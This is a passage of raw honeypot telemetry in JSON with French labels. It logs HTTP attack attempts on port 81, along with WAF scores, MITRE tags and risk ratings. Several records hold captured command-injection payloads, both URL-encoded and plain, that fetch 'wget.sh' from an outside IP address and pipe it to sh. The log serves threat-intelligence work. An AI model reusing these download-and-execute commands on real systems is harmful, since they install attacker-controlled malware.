\u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/makeRequest.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 88 \u00b7 3 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":183},{"id":11860775,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59974,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":54,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022441cc5b67a55d21750145916cc982a43fa68ef55\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 293, \u0022payload_entropy\u0022: 5.162191703416526, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002260de6e38eefb4e2dfd26904a9d97c1b473cb8a78\u0022, \u0022event_fingerprint\u0022: \u00223f3edc9bfeb5d9a8d2ce0189352d38899cfa0366\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00222dd65a97beaa4f0b5799642a0cd6f769\u0022, \u0022path_pattern_hash\u0022: \u0022f53c505b8189dcd6ba06b06234c7e209\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60\u0022, \u0022query_string\u0022: \u0022param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60\u0022, \u0022query_string\u0022: \u0022param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60 HTTP\/1.1\\r\\nHost:\u0022, \u0022payload_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00226ad573000e0c6cb268627288eead422f3ab948c6\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":293},{"id":11860776,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59990,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/command.php","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022387fa52c89852ad587baa76ccfb83021cdde7544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 304, \u0022payload_entropy\u0022: 5.168075743678927, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00220a6a33b97433411fefc01a8405c1ff51b11f989e\u0022, \u0022event_fingerprint\u0022: \u0022edf5af4d24f8127fc23a60428efe92f0fa0ee3ec\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c20570483ccd1966f979f014c847c5d6\u0022, \u0022path_pattern_hash\u0022: \u0022ae299b1b73fdd9de9a67e4429bae2022\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/command.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlcmd;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlc\u0022, \u0022payload_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/command.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlcmd;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlc\u0022, \u0022payload_snippet\u0022: \u0022POST \/command.php 